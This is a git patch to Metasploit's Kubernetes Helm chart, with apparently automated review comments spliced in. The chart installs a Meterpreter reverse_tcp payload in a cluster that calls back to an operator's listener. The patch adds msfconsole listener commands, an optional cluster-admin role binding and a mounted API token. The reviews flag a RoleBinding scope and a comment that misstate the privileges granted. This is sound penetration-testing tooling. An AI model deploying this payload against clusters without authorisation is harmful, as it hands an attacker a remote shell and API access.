From ee093d0c21a6a4223520641845cd5d65ccfc5dc2 Mon Sep 17 00:00:00 2001
From: adfoster-r7
Date: Fri, 5 Nov 2021 14:22:45 +0000
Subject: [PATCH] Meterpreter Helm chart tweaks

---
 kubernetes/.gitignore | 2 +-
 kubernetes/Makefile | 15 ++---
 kubernetes/README.md | 61 ++++++++-----------
 kubernetes/meterpreter/Chart.yaml | 5 +-
 kubernetes/meterpreter/templates/NOTES.txt | 9 ++-
 .../meterpreter/templates/deployment.yaml | 14 ++---
 kubernetes/meterpreter/templates/rbac.yaml | 6 +-
 kubernetes/meterpreter/values.yaml | 14 ++---
 8 files changed, 59 insertions(+), 67 deletions(-)

diff --git a/kubernetes/.gitignore b/kubernetes/.gitignore
index ab517dbf38..b63ed2b9a9 100644
--- a/kubernetes/.gitignore
+++ b/kubernetes/.gitignore
@@ -1,3 +1,3 @@
 metasploit/charts
 metasploit.yaml
-meterpreter.yaml
\ No newline at end of file
+meterpreter.yaml
diff --git a/kubernetes/Makefile b/kubernetes/Makefile
index db9334a2b9..027b8cf6f0 100644
--- a/kubernetes/Makefile
+++ b/kubernetes/Makefile
@@ -1,26 +1,23 @@
-#
-#
-#
 .SECONDARY:
 .SECONDEXPANSION:
 lint-charts: ##@Lint Lint Helm Chart
- helm lint meterpreter
+ helm lint meterpreter
 generate-deployment: ##@Generate Generate YAML based deployment
- helm template meterpreter meterpreter --set lport="4444" --set lhost="1.1.1.1" > meterpreter.yaml
+ helm template meterpreter meterpreter --set lport="4444" --set lhost="1.1.1.1" > meterpreter.yaml
 install-meterpreter: ##@meterpreter Install meterpreter chart
 helm upgrade --create-namespace -i -n metasploit meterpreter ./meterpreter
-delete-meterpreter: ##@meterpreter Delete meterpreter chart
- helm -n metasploit delete meterpreter
+delete-meterpreter: ##@meterpreter Delete meterpreter chart
+ helm -n metasploit delete meterpreter
-create-kind-cluster: ##@Test create KIND cluster
+create-kind-cluster: ##@Test create kind cluster
 kind create cluster --image kindest/node:v1.18.2 --name metasploit
-delete-kind-cluster: ##@Test delete KIND cluster
+delete-kind-cluster: ##@Test delete kind cluster
 kind delete cluster --name metasploit
diff --git a/kubernetes/README.md b/kubernetes/README.md
index 393f5a05a6..ca122ea9ab 100644
--- a/kubernetes/README.md
+++ b/kubernetes/README.md
@@ -1,46 +1,37 @@
+# Metasploit in Kubernetes
-# Running Metasploit Framework Against Kubernetes
+The most common workflow to test a Kubernetes environment with Metasploit is to target the Kubernetes API externally,
+or through a compromised container - both of these workflows are currently supported directly within msfconsole.
-Running metasploit framework against Kubernetes enables pentesters to security test cluster components such as the API Server, as well as internal application components or micro-services.
+An alternative to compromising a Kubernetes container to gain a Meterpreter session is to install the `meterpreter` helm chart into
+a Kubernetes environment directly. This newly opened Meterpreter session will act as the pivot point for running additional
+Metasploit modules, similar to the behavior of compromising an existing Kubernetes container with msfconsole.
-The installation chart (meterpreter) also offers to install & run a metasploit payload, that connects back to metasploit console.
-The payload can be deployed with different priviliges and permissions with respect to Kubernetes node hosting metasploit payload, as well as Kubernetes API server itself - see 'priviliges' section under values.yaml
+## Installation
-```yaml
-priviliges:
- # Disable Kubernetes API Server Access - even to the discovery APIs
- useServiceAccount: true
- # Run metasploit framework as Kubernetes cluster admin (useServiceAccount must be true for this setting to be effective)
- bindClusterRole: "" #cluster-admin
+To install the Metasploit resources in to your Kubernetes environment:
- #
- # Priviliges related to node hosting metasploit Pod
- # See: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/
- podSecurityContext: {}
- # fsGroup: 2000
- # Metasploit container security context
- securityContext: {}
- #allowPrivilegeEscalation: false
- # capabilities:
- # add:
- # - NET_BIND_SERVICE
- # drop:
- # - all
- #runAsNonRoot: true
- #runAsUser: 1000
- #runAsGroup: 1000
+1. Make sure [Helm](https://helm.sh/) (version 3 or above) is [installed](https://helm.sh/docs/intro/install/)
+2. Make sure you have an available Kubernetes cluster to deploy Metasploit. You can install a local Kubernetes cluster using [kind](https://kind.sigs.k8s.io/docs/user/quick-start/#installation)
+ You can create local kind cluster by running `make create-kind-cluster`
+2. A penester should create a Metasploit listener from msfconsole:
+```
+use payload/linux/x64/meterpreter/reverse_tcp
+set LHOST x.x.x.x
+set LPORT 4444
+to_handler
 ```
-
-# Installation
-
-1. Make sure helm (version 3 or above) is [installed](https://helm.sh/docs/intro/install/)
-2. Make sure you have an available Kubernetes cluster to deploy metasploit. You can install a local Kubernetes cluster using [KIND](https://kind.sigs.k8s.io/docs/user/quick-start/#installation)
- > You can create local KIND cluster by running `make create-kind-cluster`
 3. 
Install meterpreter helm chart by running:
 ```sh
-export MSF_PORT=""
-export MSF_IPADDRESS=""
-helm upgrade --create-namespace -i -n metasploit meterpreter ./meterpreter --set lport=$MSF_PORT --set lhost=$MSF_IPADDRESS
+export LHOST="x.x.x.x"
+export LPORT="4444"
+helm upgrade --create-namespace -i -n metasploit meterpreter ./meterpreter --set lhost=$LHOST --set lport=$LPORT
 ```
+4. If the listener from step 3 was created, ensure you now have a Meterpreter session in msfconsole
+
+## Privileges
+
+The Meterpreter container can be deployed with different privileges and permissions - see the `privileges` section within
+[./meterpreter/values.yaml](values.yaml) for more details.
diff --git a/kubernetes/meterpreter/Chart.yaml b/kubernetes/meterpreter/Chart.yaml
index ced6648341..b217614179 100644
--- a/kubernetes/meterpreter/Chart.yaml
+++ b/kubernetes/meterpreter/Chart.yaml
@@ -10,9 +10,6 @@ keywords:
 - pentest
 - penetration testing
 home: https://www.metasploit.com/
-icon: https://www.metasploit.com/includes/images/metasploit-r7-logo.svg
+icon: https://www.metasploit.com/includes/images/metasploit-og.png
 sources:
 - https://github.com/rapid7/metasploit-framework
-maintainers:
-- email: msfdev@metasploit.com
- name: Metasploit Hackers
\ No newline at end of file
diff --git a/kubernetes/meterpreter/templates/NOTES.txt b/kubernetes/meterpreter/templates/NOTES.txt
index b7739c6955..610ad69940 100644
--- a/kubernetes/meterpreter/templates/NOTES.txt
+++ b/kubernetes/meterpreter/templates/NOTES.txt
@@ -1 +1,8 @@
-Make sure meterpreter connected to your Metasploit Receive Handler running at {{ .Values.lhost}}:{{.Values.lport}}
\ No newline at end of file
+Make sure meterpreter connected to your Metasploit listener running at {{ .Values.lhost }}:{{ .Values.lport }}
+
+You can create a Metasploit listener with:
+
+use payload/linux/x64/meterpreter/reverse_tcp
+set LHOST {{ .Values.lhost }}
+set LPORT {{ .Values.lport }}
+to_handler
diff --git a/kubernetes/meterpreter/templates/deployment.yaml b/kubernetes/meterpreter/templates/deployment.yaml
index 9725ee4e86..be632cb7c3 100644
--- a/kubernetes/meterpreter/templates/deployment.yaml
+++ b/kubernetes/meterpreter/templates/deployment.yaml
@@ -18,17 +18,17 @@ spec:
 imagePullSecrets:
 {{- toYaml . | nindent 8 }}
 {{- end }}
- {{- if .Values.priviliges.useServiceAccount }}
+ {{- if .Values.privileges.useServiceAccount }}
 serviceAccountName: {{ include "meterpreter.fullname" . }}
 {{ else }}
 automountServiceAccountToken: false
 {{ end }}
 securityContext:
- {{- toYaml .Values.priviliges.podSecurityContext | nindent 8 }}
+ {{- toYaml .Values.privileges.podSecurityContext | nindent 8 }}
 initContainers:
 - name: msfvenome
 image: "{{ .Values.image.repository}}:{{ .Values.image.tag }}"
- imagePullPolicy: {{ .Values.image.pullPolicy }}
+ imagePullPolicy: {{ .Values.image.pullPolicy }}
 command: ["/bin/bash", "-c", "/tmp/meterpreter.sh"]
 env:
 - name: LHOST
@@ -41,23 +41,23 @@ spec:
 - name: msfvenome
 mountPath: /tmp/meterpreter.sh
 subPath: meterpreter.sh
-
+
 containers:
 - name: {{ .Chart.Name }}
 image: gcr.io/google_containers/pause-amd64:3.0
- imagePullPolicy: {{ .Values.image.pullPolicy }}
+ imagePullPolicy: {{ .Values.image.pullPolicy }}
 command: ["/meterpreter/meterpreter"]
 tty: true
 stdin: true
 securityContext:
- {{- toYaml .Values.priviliges.securityContext | nindent 12 }}
+ {{- toYaml .Values.privileges.securityContext | nindent 12 }}
 resources:
 {{- toYaml .Values.resources | nindent 12 }}
 volumeMounts:
 - name: meterpreter
 mountPath: /meterpreter
-
+
 restartPolicy: Always
 volumes:
 - name: meterpreter
diff --git a/kubernetes/meterpreter/templates/rbac.yaml b/kubernetes/meterpreter/templates/rbac.yaml
index a288d524d6..d605f4b52d 100644
--- a/kubernetes/meterpreter/templates/rbac.yaml
+++ b/kubernetes/meterpreter/templates/rbac.yaml
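Review bot: Style: the renamed `{{- if .Values.privileges.useServiceAccount }}` line in the first deployment.yaml hunk carries a left trim marker, but its paired `{{ else }}` and `{{ end }}` two and four lines below do not, which is inconsistent with the `{{- end }}` directly above and appears to leave whitespace-only lines in the rendered pod spec. Writing them as `{{- else }}` and `{{- end }}` keeps the block uniform; the `nindent` on the following `securityContext` value is unaffected. The enclosing `spec:` block starts before the hunk.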
@@ -1,4 +1,4 @@
-{{- if .Values.priviliges.useServiceAccount -}}
+{{- if .Values.privileges.useServiceAccount -}}
 apiVersion: v1
 kind: ServiceAccount
 metadata:
@@ -7,7 +7,7 @@ metadata:
 {{- include "meterpreter.labels" . | nindent 4 }}
 ---
-{{- if ne .Values.priviliges.bindClusterRole "" -}}
+{{- if ne .Values.privileges.bindClusterRole "" -}}
 apiVersion: rbac.authorization.k8s.io/v1
 kind: RoleBinding
 metadata:
@@ -17,7 +17,7 @@ metadata:
 roleRef:
 apiGroup: rbac.authorization.k8s.io
 kind: ClusterRole
- name: {{ .Values.priviliges.bindClusterRole }}
+ name: {{ .Values.privileges.bindClusterRole }}
 subjects:
 - kind: ServiceAccount
 name: {{ include "meterpreter.fullname" . }}
diff --git a/kubernetes/meterpreter/values.yaml b/kubernetes/meterpreter/values.yaml
index 13c8769bac..0a5b30d1f2 100644
--- a/kubernetes/meterpreter/values.yaml
+++ b/kubernetes/meterpreter/values.yaml
@@ -1,9 +1,9 @@
 # Default values for meterpreter.
 #The IP Address the payload will connect to
-lhost:
+lhost:
 #The Port meterpreter will connect to
-lport:
+lport:
 image:
 repository: metasploitframework/metasploit-framework
@@ -14,15 +14,15 @@ imagePullSecrets: []
 nameOverride: ""
 fullnameOverride: ""
-# Tune the priviliges your Kubernetes meterpreter will run with
-priviliges:
+# Tune the privileges your Kubernetes meterpreter will run with
+privileges:
 # Disable Kubernetes API Server Access - even to the discovery APIs
 useServiceAccount: true
-# Run metasploit framework as Kubernetes cluster admin (useServiceAccount must be true for this setting to be effective)
-bindClusterRole: "" #cluster-admin
+# Run Metasploit framework as Kubernetes cluster admin (useServiceAccount must be true for this setting to be effective)
+bindClusterRole: "" #cluster-admin
 #
-# Priviliges related to node hosting metasploit Pod
+# Privileges related to node hosting metasploit Pod
 # See: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/
 podSecurityContext: {}
 # fsGroup: 2000
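Review bot: The binding renamed in the second and third rbac.yaml hunks is a namespaced `RoleBinding` whose `roleRef` points at a `ClusterRole`, so the role named by `privileges.bindClusterRole` is granted to the chart's service account only within the release namespace, not across the cluster. That does not match the values.yaml comment `Run Metasploit framework as Kubernetes cluster admin`, which a reader will take to mean cluster-wide access, and the README's new "Privileges" section points them at that comment. Suggest the values.yaml comment read `# Bind the named ClusterRole to the pod's service account, scoped to the release namespace by a RoleBinding (useServiceAccount must be true)`; if cluster-wide scope is what the chart intends, that is a deliberate widening of privilege that should be an explicit, documented decision rather than something implied by a comment. The `{{- if ne ... -}}` block opened in the second hunk closes outside it.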
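Review bot: The comment kept above `useServiceAccount: true` in the last values.yaml hunk says `Disable Kubernetes API Server Access - even to the discovery APIs`, but `true` is the permissive setting: deployment.yaml assigns `serviceAccountName` in the `if` branch and only sets `automountServiceAccountToken: false` in the `else`, so the default mounts an API token and the comment describes the opposite value. Suggest `# Mount a service account token so the payload can reach the Kubernetes API; set to false to block API access (even the discovery APIs)`. Separately, `lhost:` and `lport:` in the first hunk are still bare after the trailing-whitespace fix and so parse as null, which the templates substitute directly; declaring them as `lhost: ""` / `lport: ""` with a `# required: set with --set lhost=... --set lport=...` comment would make the requirement visible and keep the type consistent with `bindClusterRole: ""`. Minor style: yamllint expects a space after `#` in `#The IP Address ...` / `#The Port ...` and two spaces before the inline `#cluster-admin` comment.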